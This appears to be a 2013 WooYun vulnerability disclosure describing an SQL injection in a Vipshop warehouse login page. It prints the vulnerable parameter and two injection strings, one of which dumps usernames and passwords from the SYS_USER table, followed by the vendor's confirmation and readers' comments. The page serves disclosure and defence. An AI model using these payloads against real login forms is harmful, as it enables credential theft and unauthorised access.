当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-025407

漏洞标题:唯品会某应用SQL注射漏洞,可获取用户密码并进入后台

相关厂商:唯品会

漏洞作者: applychen

提交时间:2013-06-08 10:33

修复时间:2013-07-23 10:34

公开时间:2013-07-23 10:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-06-08: 细节已通知厂商并且等待厂商处理中
2013-06-08: 厂商已经确认,细节仅向厂商公开
2013-06-18: 细节向核心白帽子及相关领域专家公开
2013-06-28: 细节向普通白帽子公开
2013-07-08: 细节向实习白帽子公开
2013-07-23: 细节向公众公开

简要描述:

SQL注射漏洞,没啥好说的……

详细说明:

漏洞发生在以下的页面:
http://wms.vipshop.com:8181/WebUI/UserLogin.aspx?i=1
其中登录框的ctl00$Content$txtUserName参数能够注入语句。
输入测试语句:

1'and 1=(select @@version) and '1'='1


2013-6-8 0-41-41.png


查询登录账户:

1'and 1=(select substring((select USERNAME,USERPASS from SYS_USER for xml auto),1,4000)) and '1'='1


2013-6-8 0-46-35.png


最终成功登录:

2013-6-8 0-44-28.png


漏洞证明:

同上

修复方案:

过滤危险字符

版权声明:转载请注明来源 applychen@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2013-06-08 15:40

厂商回复:

漏洞属实,修复进行中;我们给帮助我们发现重大安全漏洞的白帽子赠送礼品;如果您直接将漏洞信息发送到infosec@vipshop.com,我们的礼品会更加丰厚!

最新状态:

暂无


漏洞评价:

评论

  1. 2013-06-08 16:01 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    厂商想在乌云被封号?

  2. 2013-06-08 16:19 | X,D ( 普通白帽子 | Rank:143 漏洞数:8 | X,D)

    @xsser 神的回复,犀利哥的节奏

  3. 2013-06-09 00:52 | applychen ( 普通白帽子 | Rank:163 漏洞数:16 | 白发现首)

    竞争激烈啊

  4. 2013-07-23 11:04 | x1aoh4i ( 普通白帽子 | Rank:403 漏洞数:62 )

    神的回复 亮了

  5. 2013-07-23 18:27 | IXY ( 路人 | Rank:19 漏洞数:3 | 小菜来学习的)

    厂商回复就像是说 上访的人如果直接把信交给当地官员 会有奖金一样